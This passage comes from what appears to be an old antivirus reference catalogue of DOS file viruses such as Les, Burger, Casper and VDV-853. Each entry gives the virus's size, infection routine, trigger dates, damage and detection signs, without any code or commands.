  1780. 1) Doesn't stay resident in memory.
  1781. 2) PA-5792 doesn't hook INT 24h when infecting files. Error message
  1782.     appears if there is an I/O error (such as write protect).
  1783.  
  1784. [Les]
  1785. Virus Name: Les
  1786. Virus Type: File Virus (infects .EXE files)
  1787. Virus Length: 358 Bytes
  1788. PC Vectors Hooked: None
  1789.  
  1790. Execution Procedure:
  1791. 1) Searches for an .EXE file in the current directory.
  1792. 2) It then checks to see whether it has been infected by the LES
  1793.     virus.  If "Yes", it continues to look for any uninfected
  1794.     .EXE file.
  1795. 3) It finally infects all .EXE files in the directory.
  1796.  
  1797. Damage:  None
  1798.  
  1799. Detection Method:  Infected files will increase by 358 Bytes.
  1800.  
  1801. Note:
  1802. 1) Doesn't stay resident in memory.
  1803. 2) LES doesn't hook INT 24h when infecting files. Error message
  1804.     appears if there is an I/O error (such as write protect).
  1805.  
  1806. [H & P]
  1807. Virus Name: H&P
  1808. Virus Type: File Virus (infects .COM files)
  1809. Virus Length: No change
  1810. PC Vectors Hooked: None
  1811.  
  1812. Execution Procedure:
  1813. 1) Searches for a COM file in the current directory.
  1814. 2) It then checks whether it has been infected by H&P. If "Yes",
  1815.     it continues to look for any uninfected .COM files.
  1816. 3) It only infects one file at a time.
  1817.  
  1818. Damage: Overwrites original file, so the length of infected file
  1819. won't increase.
  1820.  
  1821. Note:
  1822. 1) Doesn't stay resident in memory.
  1823. 2) H&P doesn't hook INT 24h when infecting files. Error message
  1824.     appears if there is an I/O error (such as write protect).
  1825.  
  1826. [OW]
  1827. Virus Name: Ow
  1828. Virus Type: File Virus (infects .COM files)
  1829. Virus Length: No change
  1830. PC Vectors Hooked: None
  1831.  
  1832. Execution Procedure:
  1833. 1) Searches for a COM file in the current directory.
  1834. 2) It then checks to see whether it has been already infected by OW.
  1835.     If "Yes", it continues to look for any uninfected .COM file.
  1836. 3) It finally infects all files in the directory.
  1837.  
  1838. Damage:  Overwrites original files, so the length of infected file
  1839. won't increase.
  1840.  
  1841. Note:
  1842. 1) Doesn't stay resident in memory.
  1843. 2) OW doesn't hook INT 24h when infecting files. Error message appears
  1844.     if there is an I/O error (such as write protect).
  1845.  
  1846. [Small115]
  1847. Virus Name: Small115
  1848. Virus Type: File Virus (infects .COM files)
  1849. Virus Length: 115 Bytes
  1850. PC Vectors Hooked: None
  1851.  
  1852. Execution Procedure:
  1853. 1) Searches for a .COM file in the current directory.
  1854. 2) It then checks whether it has been infected by Small115. If "Yes",
  1855.     it continues to look for any uninfected .COM file.
  1856. 3) It finally infects all the .COM files in the directory.
  1857.  
  1858. Damage:  Infected files won't be able to execute.
  1859.  
  1860. Detection Method:  Infected files will increase by 115 Bytes.
  1861.  
  1862. Note:
  1863. 1) Doesn't stay resident in memory.
  1864. 2) Small115 doesn't hook INT 24h when infecting files.  Error
  1865.     message appears if there is an I/O error of (such as write protect).
  1866.  
  1867. [Torm-263]
  1868. Virus Name: Torm-263
  1869. Virus Type: File Virus (infects .COM files)
  1870. Virus Length: 263 Bytes(COM)
  1871. PC Vectors Hooked: None
  1872.  
  1873. Execution Procedure:
  1874. 1) Searches for a .COM file in the current directory.
  1875. 2) It then checks whether it has been infected by TORM-263. If "Yes",
  1876.     it continues to look for any uninfected .COM files.
  1877. 3) It then infects all uninfected files in the directory.
  1878. 4) Finally, it executes the original file.
  1879.  
  1880. Damage:  None
  1881.  
  1882. Detection Method:  Infected files will increase by 263 Bytes.
  1883.  
  1884. Note:
  1885. 1) Doesn't stay resident in memory.
  1886. 2) TORM-263 doesn't  hook INT 24h when infecting files. Error
  1887.     message appears if there is an I/O error (such as write protect).
  1888.  
  1889. [Radyum]
  1890. Virus Name: Radyum
  1891. Virus Type: File Virus (infects .COM files)
  1892. Virus Length: 448 Bytes(COM)
  1893. PC Vectors Hooked: None
  1894.  
  1895. Execution Procedure:
  1896. 1) Searches for a .COM file in the current directory.
  1897. 2) It checks whether it has been infected by Radyum. If "Yes", it
  1898.     continues to look for any uninfected .COM files.
  1899. 3) It only infects one file at a time.
  1900. 4) Finally it executes the original file.
  1901.  
  1902. Damage:  None
  1903.  
  1904. Detection Method: Infected files will increase by 448 Bytes.
  1905.  
  1906. Note:
  1907. 1) Doesn't stay resident in memory.
  1908. 2) Radyum doesn't hook INT 24h when infecting files. Error message
  1909.     appears if there is an I/O error (such as write protect).
  1910.  
  1911. [Psycho]
  1912. Virus Name: Psycho
  1913. Virus Type: File Virus (infects .EXE and .COM files)
  1914. Virus Length: No change
  1915. PC Vectors Hooked: None
  1916.  
  1917. Execution Procedure:
  1918. 1) Searches for a .COM or .EXE file in the current directory.
  1919. 2) It checks whether the file has been infected by Psycho. If "Yes",
  1920.     it continues to search for an uninfected .COM or .EXE file.
  1921. 3) It then infects all .EXE and .COM files in the directory.
  1922.  
  1923. Damage:  Overwrites original files, so the length of infected
  1924. files won't increase.
  1925.  
  1926. Note:
  1927. 1) Doesn't stay resident in memory.
  1928. 2) Psycho doesn't hook INT 24h when infecting files. Error message
  1929.     appears if there is an I/O error (such as write protect).
  1930.  
  1931. [VCL9]
  1932. Virus Name: Vcl9
  1933. Virus Type: File Virus (infects .EXE and .COM files)
  1934. Virus Length: No change
  1935. PC Vectors Hooked: None
  1936.  
  1937. Execution Procedure:
  1938. 1) Searches for .COM or .EXE files in the current directory.
  1939. 2) It checks  whether the first file found has been infected by VCL9.
  1940.     If "Yes", it continues to look for any uninfected .COM or .EXE
  1941.     file.
  1942. 3) It only infects two files at a time.
  1943.  
  1944. Damage:  Overwrites original files, so the length of infected files
  1945. won't increase.
  1946.  
  1947. Note:
  1948. 1) Doesn't stay resident in memory.
  1949. 2) VCL9 doesn't hook INT 24h when infecting files. Error message
  1950.     appears if there is an I/O error (such as write protect).
  1951.  
  1952. [Cheesy]
  1953. Virus Name: Cheesy
  1954. Virus Type: File Virus (infects .EXE files)
  1955. Virus Length: 381 Bytes(EXE)
  1956. PC Vectors Hooked: None
  1957.  
  1958. Execution Procedure:
  1959. 1) Searches for an .EXE file in the current directory.
  1960. 2) When it locates an .EXE file it checks whether it has been
  1961.     infected by CHEESY. If "Yes", it continues to look for an
  1962.     uninfected .EXE file.
  1963. 3) It then proceeds to infect all the .EXE files in the directory.
  1964. 4) Once a file is executed the system halts.
  1965.  
  1966. Damage:  System halts
  1967.  
  1968. Detection Method:  Infected files will increase by 381 Bytes.
  1969.  
  1970. Note:
  1971. 1) Doesn't stay resident in memory.
  1972. 2) CHEESY doesn't hook INT 24h when infecting files. Error message
  1973.     appears if there is an I/O error (such as write protect).
  1974.  
  1975. [Dutch]
  1976. Virus Name: Dutch
  1977. Virus Type: File Virus (infects .COM files)
  1978. Virus Length: 358 Bytes(COM)
  1979. PC Vectors Hooked: None
  1980.  
  1981. Execution Procedure:
  1982. 1) Searches for a .COM file in the current directory.
  1983. 2) When it locates a file it checks whether it has been infected by
  1984.     Dutch. If "Yes", it continues to look for any uninfected .COM
  1985.     file.
  1986. 3) It only infects one file at a time.
  1987.  
  1988. Damage:  None
  1989.  
  1990. Detection Method:  Infected files will increase by 358 Bytes.
  1991.  
  1992. Note:
  1993. 1) Doesn't stay resident in memory.
  1994. 2) Dutch doesn't hook INT 24h when infecting files.  Error message
  1995.     appears if there is an I/O error (such as write protect).
  1996.  
  1997. [Mini-2]
  1998. Virus Name: Mini-2
  1999. Virus Type: File Virus (infects .COM files)
  2000. Virus Length: No change
  2001. PC Vectors Hooked: None
  2002.  
  2003. Execution Procedure:
  2004. 1) Searches for a .COM file in the current directory.
  2005. 2) Once it locates the first .COM file it checks whether it has
  2006.     been infected by MINI-2.  If "Yes", it continues to look for
  2007.     any uninfected .COM files.
  2008. 3) It then infects all .COM files in the directory.
  2009.  
  2010. Damage:  Overwrites original files, so the length of infected files
  2011. won't increase.
  2012.  
  2013. Note:
  2014. 1) Doesn't stay resident in memory.
  2015. 2) MINI-2 doesn't hook INT 24h when infecting files. Error message
  2016.     appears if there is an I/O error (such as write protect).
  2017.  
  2018. [Define-1]
  2019. Virus Name: Define-1
  2020. Virus Type: File Virus (infects .EXE and .COM files)
  2021. Virus Length: No change
  2022. PC Vectors Hooked: None
  2023.  
  2024. Execution Procedure:
  2025. 1) Searches for an .EXE or .COM file in the current directory.
  2026. 2) Once it locates a file it checks whether it has been infected
  2027.     by Define-1. If "Yes", it continues to look for another
  2028.     uninfected .COM or .EXE file.
  2029. 3) It only infects one file at a time.
  2030.  
  2031. Damage:  Overwrites original file, so the length of infected file
  2032. won't increase.
  2033.  
  2034. Note:
  2035. 1) Doesn't stay resident in memory.
  2036. 2) Define-1 doesn't  hook INT 24h when infecting files. Error
  2037.     message appears if there is an I/O error (such as write protect).
  2038.  
  2039. [205]
  2040. Virus Name: 205
  2041. Virus Type: File Virus (infects .COM files)
  2042. Virus Length: 205 Bytes(COM)
  2043. PC Vectors Hooked: None
  2044.  
  2045. Execution Procedure:
  2046. 1) Searches for a .COM file in the current directory.
  2047. 2) When it locates a .COM file it checks if the file has been
  2048.     previously infected by 205. If "Yes", it continues to look for
  2049.     an uninfected .COM file.
  2050. 3) It then proceeds to infect all the .COM files in the directory.
  2051. 4) Finally it executes the originally called file.
  2052.  
  2053. Damage:  None
  2054.  
  2055. Detection Method:  Infected files will increase by 205 Bytes.
  2056.  
  2057. Note:
  2058. 1) Doesn't stay resident in memory.
  2059. 2) 205 doesn't hook INT 24h when infecting files. Error message
  2060.     appears if there is an I/O error (such as write protect).
  2061.  
  2062. [Banana]
  2063. Virus Name: Banana
  2064. Virus Type: File Virus (infects .COM files)
  2065. Virus Length: No change
  2066. PC Vectors Hooked: None
  2067.  
  2068. Execution Procedure:
  2069. 1) Searches for a .COM file in the current directory.
  2070. 2) When it locates a .COM file it checks whether or not it has been
  2071.     infected by Banana. If "Yes", it continues to search for another
  2072.     uninfected .COM file.
  2073. 3) It then proceeds to infect all .COM files in the directory.
  2074.  
  2075. Damage:  Overwrites original file, so the length of infected file
  2076. won't increase.
  2077.  
  2078. Note:
  2079. 1) Doesn't stay resident in memory.
  2080. 2) Banana doesn't hook INT 24h when infecting files. Error message
  2081.     appears if there is an I/O error (such  as write protect).
  2082.  
  2083. [334]
  2084. Virus Name: 334
  2085. Virus Type: File Virus (infects .COM files)
  2086. Virus Length: 334 Bytes(COM)
  2087. PC Vectors Hooked: None
  2088.  
  2089. Execution Procedure:
  2090. 1) Searches for a .COM file in the current directory.
  2091. 2) Once it locates a .COM file it checks whether it has been
  2092.     infected by 334. If "Yes", it continues to search for an
  2093.     uninfected .COM file.
  2094. 3) It infects uninfected files one at a time.
  2095. 4) Finally it executes the original file.
  2096.  
  2097. Damage:  None
  2098.  
  2099. Detection Method: Infected files will increase by 334 Bytes.
  2100.  
  2101. Note:
  2102. 1) Doesn't stay resident in memory.
  2103. 2) 334 doesn't hook INT 24h when infecting files. Error message
  2104.     appears if there is an I/O error (such as write protect).
  2105.  
  2106. [Redx-1]
  2107. Virus Name: Redx-1
  2108. Virus Type: File Virus (infects .COM files)
  2109. Virus Length: 796 Bytes
  2110. PC Vectors Hooked: None
  2111.  
  2112. Execution Procedure:
  2113. 1) Searches for a .COM file in the C:\ root directory.
  2114. 2) Once it locates a .COM  file it checks whether it has been infected
  2115.     by REDX-1. If "Yes", it continues searching for an uninfected .COM
  2116.     file.
  2117. 3) It then infects other .COM files two at a time.
  2118. 4) It finally executes the original file.
  2119.  
  2120. Damage:  None
  2121.  
  2122. Detection Method:  Infected files will increase by 796 Bytes.
  2123.  
  2124. Note:
  2125. 1) Doesn't stay resident in memory.
  2126. 2) REDX-1 doesn't hook INT 24h when infecting files. Error message
  2127.     appears if there is an I/O error (such as  write protect).
  2128.  
  2129. [Dismember]
  2130. Virus Name: Dismember
  2131. Virus Type: File Virus (infects .COM files)
  2132. Virus Length: 288 Bytes(COM)
  2133. PC Vectors Hooked: None
  2134.  
  2135. Execution Procedure:
  2136. 1) Searches  for a .COM file in the current directory.
  2137. 2) Once it locates a .COM  file it checks whether it has been infected
  2138.     by Dismember. If "Yes", it continues to search for an uninfected
  2139.     .COM file.
  2140. 3) It then infects all .COM files in the directory.
  2141. 4) Finally, it executes the originally called file.
  2142.  
  2143. Damage:  None
  2144.  
  2145. Detection Method:  Infected files will increase by 288 Bytes.
  2146.  
  2147. Note:
  2148. 1) Doesn't stay resident in memory.
  2149. 2) Dismember doesn't hook INT 24h when infecting files. Error
  2150.     message appears if there is an I/O error (such as write protect).
  2151.  
  2152. [Timid]
  2153. Virus Name: Timid
  2154. Virus Type: File Virus (infects .COM files)
  2155. Virus Length: 306 Bytes (COM)
  2156. PC Vectors Hooked: None
  2157.  
  2158. Execution Procedure:
  2159. 1) Searches for a .COM file in the current directory.
  2160. 2) Once it locates a file it checks whether it has been infected by
  2161.     Timid. If "Yes", it continues to search for an uninfected
  2162.     .COM file.
  2163. 3) It then infects one file at a time and displays the infected file
  2164.     name on the screen.
  2165. 4) Once the file is executed the system will halt.
  2166.  
  2167. Damage:  Damages original file.
  2168.  
  2169. Detection Method:
  2170. 1) Infected files will increase by 306 Bytes.
  2171. 2) Other file names are shown on the screen.
  2172.  
  2173. Note:
  2174. 1) Doesn't stay resident in memory.
  2175. 2) Timid doesn't hook INT 24h when infecting files.  Error message
  2176.     appears if there is an I/O error (such as write protect).
  2177.  
  2178. [Druid]
  2179. Virus Name: Druid
  2180. Virus Type: File Virus (infects .COM files)
  2181. Virus Length: No change
  2182. PC Vectors Hooked: None
  2183.  
  2184. Execution Procedure:
  2185. 1) Searches for a COM file in the current  directory.
  2186. 2) Once it locates a file it checks whether it has been infected by
  2187.     Druid. If "Yes", it continues to search  for any uninfected
  2188.     .COM file.
  2189. 3) It then infects all .COM files in the directory.
  2190.  
  2191. Damage:  Overwrites original file, so the length of infected file
  2192. won't increase.
  2193.  
  2194. Note:
  2195. 1) Doesn't stay resident in memory.
  2196. 2) Druid doesn't hook INT 24h when infecting files.  Error message
  2197.     appears if there is an I/O error (such as write protect).
  2198.  
  2199. [Itti-B]
  2200. Virus Name: Itti-B
  2201. Virus Type: File Virus (infects .COM files)
  2202. Virus Length: No change
  2203. PC Vectors Hooked: None
  2204.  
  2205. Execution Procedure:
  2206. 1) Searches for a .COM file in the current directory.
  2207. 2) Once it locates a file it checks whether it has been infected by
  2208.     ITTI-B. If "Yes", it continues to look for any  uninfected
  2209.     .COM file.
  2210. 3) It will only infect one file at a time.
  2211. 4) It finally damages all the data on current disk if none of the
  2212.     .COM files are infected.
  2213.  
  2214. Damage:
  2215. 1) Overwrites original file, so the length of infected  file won't
  2216.     increase.
  2217. 2) Damages all data on current disk if none of the .COM files are
  2218.     infected.
  2219.  
  2220. Note:
  2221. 1) Doesn't stay resident in memory.
  2222. 2) ITTI-B doesn't hook INT 24h when infecting files. Error message
  2223.     appears if there is an I/O error (such as  write protect).
  2224.  
  2225. [Itti-A]
  2226. Virus Name: Itti-A
  2227. Virus Type: File Virus (infects .COM files)
  2228. Virus Length: No change
  2229. PC Vectors Hooked: None
  2230.  
  2231. Execution Procedure:
  2232. 1) Searches for a .COM file in the current directory.
  2233. 2) Once it locates a .COM file it checks whether it has been infected
  2234.     by ITTI-A. If "Yes", it continues to look for any  uninfected
  2235.     .COM file.
  2236. 3) It infects only one file at a time. Then when the file is executed
  2237.     the message "EXEC FAILURE" will show on the screen.
  2238. 4) It will finally damage all data on current disk if no .COM file
  2239.     is infected.
  2240.  
  2241. Damage:
  2242. 1) Overwrites original file, so the length of infected  file won't
  2243.     increase.
  2244. 2) Damages all data on current disk if no .COM file is infected.
  2245.  
  2246. Note:
  2247. 1) Doesn't stay resident in memory.
  2248. 2) ITTI-A doesn't hook INT 24h when infecting files. Error message
  2249.     appears if there is an I/O error (such as write protect).
  2250.  
  2251. [Burger]
  2252. Virus Name: Burger
  2253. Virus Type: File Virus (infects .COM files)
  2254. Virus Length: No change
  2255. PC Vectors Hooked: None
  2256.  
  2257. Execution Procedure:
  2258. 1) Searches for a COM file in the current directory.
  2259. 2) Checks whether it has been infected by Burger. If "Yes", it
  2260.     continues to look for an uninfected COM file.
  2261. 3) Infects only one file at a time.
  2262. 4) Damages all data on current disk if no .COM file is infected.
  2263.  
  2264. Damage:
  2265. 1) Overwrites original file, so the length of infected file won't
  2266.     increase.
  2267. 2) Damages all data on current disk if no .COM file is infected.
  2268.  
  2269. Note:
  2270. 1) Doesn't stay resident in memory.
  2271. 2) Burger doesn't hook INT 24h when infecting files. Error message
  2272.     appears if there is an I/O error (such as writing protect).
  2273.  
  2274. [Bloodlust]
  2275. Virus Name: Bloodlust
  2276. Virus Type: File Virus (infects .COM files)
  2277. Virus Length: No change
  2278. PC Vectors Hooked: None
  2279.  
  2280. Execution Procedure:
  2281. 1) Searches for a *.C* file in the current directory.
  2282. 2) Once it locates a file it checks whether it has been infected by
  2283.     Bloodlust. If "Yes", it continues to look for any uninfected
  2284.     *.C* file.
  2285. 3) Once it locates an uninfected *.C* file it will infect it and
  2286.     will continue doing this until all *.C* files are infected.
  2287.  
  2288. Damage: Overwrites original file, so the length of infected file
  2289. won't increase.
  2290.  
  2291. Note:
  2292. 1) Doesn't stay resident in memory.
  2293. 2) Bloodlust doesn't hook INT 24h when infecting files. Error message
  2294.     appears if there is an I/O error (such as write protect).
  2295.  
  2296. [ZY]
  2297. Virus Name: Zy
  2298. Virus Type: File Virus (infects .COM files)
  2299. Virus Length: 463 Bytes(COM)
  2300. PC Vectors Hooked: None
  2301.  
  2302. Execution Procedure:
  2303. 1) Searches for a .COM file in the current directory.
  2304. 2) Once it locates a file it checks whether it has been infected by
  2305.     ZY. If "Yes", it continues to look for any  uninfected .COM file.
  2306. 3) It only infects one file at a time.
  2307. 4) It finally executes the originally called file.
  2308.  
  2309. Damage:  None
  2310.  
  2311. Detection Method: Infected files will increase by 463 Bytes.
  2312.  
  2313. Note:
  2314. 1) Doesn't stay resident in memory.
  2315. 2) ZY doesn't hook INT 24h when infecting files. Error message appears
  2316.     if there is an I/O error (such as write protect).
  2317.  
  2318. [Kode4-2]
  2319. Virus Name: Kode4-2
  2320. Virus Type: File Virus (infects .COM files)
  2321. Virus Length: About 3000 Bytes (COM)
  2322. PC Vectors Hooked: None
  2323.  
  2324. Execution Procedure:
  2325. 1) Searches for a *.C* file in the current directory.
  2326. 2) Infects all the *.C* files in the directory.
  2327. 3) Then the following screen message will appear: "-=+ Kode4 +=-, The
  2328.     one and ONLY!"
  2329.  
  2330. Damage:  Overwrites original files.
  2331.  
  2332. Detection Method: Check for the message, "-=+ Kode4 +=- The one and
  2333. ONLY!" on the screen.
  2334.  
  2335. Note:
  2336. 1) Doesn't stay resident in memory.
  2337. 2) Kode4-2 doesn't hook INT 24h when infecting files. Error message
  2338.     appears if there is an I/O error (such as write protect).
  2339.  
  2340. [Mini-212]
  2341. Virus Name: Mini-212
  2342. Virus Type: File Virus (infects .COM files)
  2343. Virus Length: 212 or 300 Bytes(COM)
  2344. PC Vectors Hooked: None
  2345.  
  2346. Execution Procedure:
  2347. 1) Searches for a .COM file in the current directory beginning with
  2348.     files starting with the letter "A" and randomly selecting files
  2349.     through the letter "Z".
  2350. 2) It then checks the file whether it has been infected by MINI-212.
  2351.     If "Yes", it continues to look for an uninfected .COM file.
  2352. 3) It only infects one file at a time.
  2353.  
  2354. Damage:  None
  2355.  
  2356. Detection Method: Infected files will increase by 212 or 300 bytes.
  2357.  
  2358. Note:
  2359. 1) Doesn't stay resident in memory.
  2360. 2) MINI-212 doesn't hook INT 24h when infecting files. Error message
  2361.     appears if there is an I/O error (such as write protect).
  2362.  
  2363. [Anna]
  2364. Virus Name: Anna
  2365. Virus Type: File Virus (infects .COM files)
  2366. Virus Length: 742 Bytes(COM)
  2367. PC Vectors Hooked: None
  2368.  
  2369. Execution Procedure:
  2370. 1) Searches for a .COM file in the current directory.
  2371. 2) Once it locates a file it checks whether it has been infected by
  2372.     ANNA. If "Yes", it continues to look for any  uninfected .COM
  2373.     file.
  2374. 3) It will only infect one file at a time.
  2375. 4) If no uninfected file is found in the current directory, it will
  2376.     continue to look for an uninfected file in another directory.
  2377. 5) It will then check the system date. If it is December, then this
  2378.     message will appear on the screen: "Yole from the ARcV........."
  2379.  
  2380. Damage:  None
  2381.  
  2382. Detection Method:
  2383. 1) Infected files will increase by 742 Bytes.
  2384. 2) If it is December the following message will appear on the screen:
  2385.     "Yole from the ARcV.......".
  2386.  
  2387. Note:
  2388. 1) Doesn't stay resident in memory.
  2389. 2) ANNA doesn't hook INT 24h when infecting files. Error message
  2390.     appears if there is an I/O error (such as writing protect).
  2391.  
  2392. [Grunt2]
  2393. Virus Name: Grunt2
  2394. Virus Type: File Virus (infects .COM files)
  2395. Virus Length: 427 Bytes(COM)
  2396. PC Vectors Hooked: None
  2397.  
  2398. Execution Procedure:
  2399. 1) Searches for a .COM file in the current directory.
  2400. 2) Once it locates a file it checks whether it has been infected by
  2401.     GRUNT2. If "Yes", it continues to look for any  uninfected .COM
  2402.     file.
  2403. 3) It will infect only one file at a time.
  2404. 4) It then checks the system date. If the date is the 3rd of September
  2405.     and year is larger than 1993, it will delete a file on the current
  2406.     disk and then show the screen message: "S[GRUNT-2] -=> Agent Orange
  2407.     '92 <=-       Rock of the Marne Sir!.......".
  2408.  
  2409. Damage: If system date is 3rd of September and year is larger than
  2410. 1993, the virus will delete a file on the current disk.
  2411.  
  2412. Detection Method: Infected files will increase by 427 Bytes.
  2413.  
  2414. Note:
  2415. 1) Doesn't stay resident in memory.
  2416. 2) GRUNT2 doesn't hook INT 24h when infecting files. Error message
  2417.     appears if there is an I/O error (such as a write protect).
  2418.  
  2419. [VDV-853]
  2420. Virus Name: Vdv-853
  2421. Virus Type: File Virus (infects .COM files)
  2422. Virus Length: 853 Bytes(COM)
  2423. PC Vectors Hooked: None
  2424.  
  2425. Execution Procedure:
  2426. 1) Checks whether the system date is between the 24th and 26th of
  2427.     December. If "yes", the virus will delete all files in the
  2428.     current directory, then will create a file with 273 bytes and
  2429.     show the message: "Frhliche Weihnachten wnscht der Verband
  2430.     Deutscher Virenliebhaber Ach ja, und dann wnschen wir auch noch
  2431.     viel Spab beim Suchen nach den Daten von der Festplatte! Hello -
  2432.     Copyright S&S International, 1990".
  2433. 2) If "no", then it will search for a .COM file in the current
  2434.     directory.  b) Once it locates a file it checks whether it has
  2435.     been infected by VDV-853. If "Yes", it continues to look for an
  2436.     uninfected .COM file. c) It will only infect four files at a
  2437.     time.
  2438.  
  2439. Damage: If the system date is between the 24th and 26th of December,
  2440. the virus will delete all files in the current directory.
  2441.  
  2442. Detection Method: Infected files will increase by 853 Bytes.
  2443.  
  2444. Note:
  2445. 1) Doesn't stay resident in memory.
  2446. 2) VDV-853 don't hook INT 24h when infecting files. Error message
  2447.     appears if there is an error of I/O (such as a write protect).
  2448. 3) Virus pattern is the same as "SON_OF_VSC_2".
  2449.  
  2450. [Wild Thing]
  2451. Virus Name: Wild-Thing
  2452. Virus Type: File Virus (infects .COM files)
  2453. Virus Length: 567 Bytes(COM)
  2454. PC Vectors Hooked: None
  2455.  
  2456. Execution Procedure:
  2457. 1) Checks whether the system date is Friday. If "yes", a message
  2458.     appears on the screen: " It's Friday ........ Enjoy the weekend
  2459.     with your computer![YAM '92]." Then the system halts.
  2460. 2) If "no", then it will search for a .COM file in the current
  2461.     directory.  Once it locates a file it checks whether it has been
  2462.     infected by Wild-Thing. If "Yes", it continues to look for
  2463.     another uninfected .COM file.
  2464. 3) It will infect all files in the current and the "mother" directories
  2465.     until all .COM files become infected.
  2466. 4) Then it will execute the original file.
  2467.  
  2468. Damage: If the system date is Friday, this message appears: "It's
  2469. Friday ....... Enjoy the weekend with your computer![YAM '92]."
  2470. Then the system halts.
  2471.  
  2472. Detection Method: Infected files will increase by 567 bytes.
  2473.  
  2474. Note:
  2475. 1) Doesn't stay resident in memory.
  2476. 2) Wild-Thing doesn't hook INT 24h when infecting files. Error
  2477.     message appears if there is an I/O error (such as a write
  2478.     protect).
  2479.  
  2480. [Arcv-Fri]
  2481. Virus Name: Arcv-Fri
  2482. Virus Type: File Virus (infects .COM files)
  2483. Virus Length: 839 Bytes(COM)
  2484. PC Vectors Hooked: None
  2485.  
  2486. Execution Procedure:
  2487. 1) Checks whether the system date is April 12; if "Yes", it searches
  2488.     for a .COM file in the current directory, then damages it.
  2489. 2) If "No", then it searches for a .COM file in the current directory.
  2490. 3) It checks whether it has been infected by ARCV-FRI. If "Yes", it
  2491.     continues to look for any uninfected .COM file.
  2492. 4) It only infects one file at a time.
  2493. 5) It then executes the original file.
  2494.  
  2495. Damage: If the system date is April 12, it searches for a .COM file
  2496. in the current directory, then damages it.
  2497.  
  2498. Detection Method: Infected files will increase by 839 Bytes.
  2499.  
  2500. Note:
  2501. 1) Doesn't stay resident in memory.
  2502. 2) ARCV-FRI doesn't hook INT 24h when infecting files. Error message
  2503.     appears if there is an I/O error (such as write protect).
  2504.  
  2505. [Agent-B]
  2506. Virus Name: Agent-B
  2507. Virus Type: File Virus (infects .EXE and .COM files)
  2508. Virus Length: 763 Bytes(COM & EXE)
  2509. PC Vectors Hooked: INT 24h
  2510.  
  2511. Execution Procedure:
  2512. 1) Searches for a .COM file in the current directory.
  2513. 2) Once it locates a file it checks whether it has been infected by
  2514.     Argent. If "Yes", it continues to look for any  uninfected .COM
  2515.     file.
  2516. 3) It will infect only two files at a time.
  2517.  
  2518. Damage:  None
  2519.  
  2520. Detection Method: Infected files will increase by 763 bytes.
  2521.  
  2522. Note:
  2523. 1) Doesn't stay resident in memory.
  2524. 2) Argent hooks INT 24h when infecting files. Omits I/O error
  2525.     (such as write protect).
  2526.  
  2527. [Nanite]
  2528. Virus Name: Nanite
  2529. Virus Type: File Virus (infects .EXE and .COM files)
  2530. Virus Length: No change
  2531. PC Vectors Hooked: None
  2532.  
  2533. Execution Procedure:
  2534. 1) Searches for a .COM or .EXE file in the current directory.
  2535. 2) Once it locates a file it checks whether it has been infected by
  2536.     Nanite. If "Yes", it continues to look for any  uninfected .COM
  2537.     or .EXE file.
  2538. 3) It will infect all .EXE and .COM files until all files in the
  2539.     current directory have been infected
  2540.  
  2541. Damage: Overwrites the original files, so the length of infected
  2542. files won't increase.
  2543.  
  2544. Note:
  2545. 1) Doesn't stay resident in memory.
  2546. 2) Nanite doesn't hook INT 24h when infecting files. Error message
  2547.     appears if there is an I/O error (such as  write protect).
  2548.  
  2549. [Arcv-670]
  2550. Virus Name: Arcv-670
  2551. Virus Type: File Virus (infects .COM files)
  2552. Virus Length: 670 Bytes(COM)
  2553. PC Vectors Hooked: None
  2554.  
  2555. Execution Procedure:
  2556. 1) Searches for a .COM file in the current directory.
  2557. 2) Once it locates a file it checks whether it has been infected
  2558.     by ARCV-670. If "Yes", it continues to look for any  uninfected
  2559.     .COM file.
  2560. 3) It will infect only one file at a time.
  2561. 4) It finally checks the system date. If the date is between the
  2562.     20th and 25th of December, and the year is larger than 1992,
  2563.     it will show the message: "Happy Xmas from the ARCV", then the
  2564.     system halts.
  2565.  
  2566. Damage: If the system date is between the 20th and 25th of December
  2567. and the year is larger than 1992, this message appears: "Happy Xmas
  2568. from the ARCV", then the system halts.
  2569.  
  2570. Detection Method: Infected files will increase by 670 Bytes.
  2571.  
  2572. Note:
  2573. 1) Doesn't stay resident in memory.
  2574. 2) ARCV-670 doesn't  hook INT 24h when infecting files. Error
  2575.     message appears  if there is an I/O error  (such as write
  2576.     protect).
  2577.  
  2578. [Why]
  2579. Virus Name: Why
  2580. Virus Type: File Virus (infects .COM files)
  2581. Virus Length: 457 Bytes(COM)
  2582. PC Vectors Hooked: None
  2583.  
  2584. Execution Procedure:
  2585. 1) Searches for a .COM file in the current directory.
  2586. 2) Once it locates a file it checks whether it has been infected
  2587.     by Why. If "Yes", it continues to look for any uninfected .COM
  2588.     file.
  2589. 3) It will only infect one file at a time.
  2590. 4) It then checks the system date. If the date is the 12th of May
  2591.     or the 25th of February, the virus will damage all files on
  2592.     the hard disk.
  2593.  
  2594. Damage:  If the system date is May 12 or February 25, the virus
  2595. will damage all files on the hard disk.
  2596.  
  2597. Detection Method: Infected files will increase by 457 Bytes.
  2598.  
  2599. Note:
  2600. 1) Doesn't stay resident in memory.
  2601. 2) "Why" doesn't hook INT 24h when infecting files.  Error message
  2602.     appears if there is an I/O error (such as write protect).
  2603.  
  2604. [FCB]
  2605. Virus Name: Fcb
  2606. Virus Type: File Virus (infects .EXE and .COM files)
  2607. Virus Length: No change
  2608. PC Vectors Hooked: None
  2609.  
  2610. Execution Procedure:
  2611. 1) Searches for a .COM file in the current directory.
  2612. 2) Once it locates a file it checks whether it has been infected
  2613.     by FCB. If "Yes", it continues to look for any  uninfected
  2614.     .COM file.
  2615. 3) It will only infect one file at a time.
  2616. 4) Searches for an .EXE file in the current directory.
  2617. 5) Once it locates a file it checks whether it has been infected
  2618.     by FCB. If "Yes", it continues to look for any uninfected .EXE
  2619.     file.
  2620. 6) It will only infect one file at a time.
  2621.  
  2622. Damage: Overwrites the original file, so the length of the infected
  2623. file won't increase.
  2624.  
  2625. Note:
  2626. 1) Doesn't stay resident in memory.
  2627. 2) FCB doesn't hook  INT 24h when infecting files. Error message
  2628.     appears if there is an I/O error (such as write protect).
  2629.  
  2630. [Casper]
  2631. Virus Name: Casper
  2632. Virus Type: File Virus (infects .COM files)
  2633. Virus Length: 1200 Bytes(COM)
  2634. PC Vectors Hooked: None
  2635.  
  2636. Execution Procedure:
  2637. 1) Checks whether the system date is the first of April. If "yes",
  2638.     then it formats the current disk,
  2639. 2) If "no", then it searches for a *.C* file in the current
  2640.     directory.
  2641. 2) Once it locates a file it checks whether it has been infected by
  2642.     FCB. If "Yes", it continues to look for any  uninfected *.C*
  2643.     file.
  2644. 3) It will only infect one file at a time.
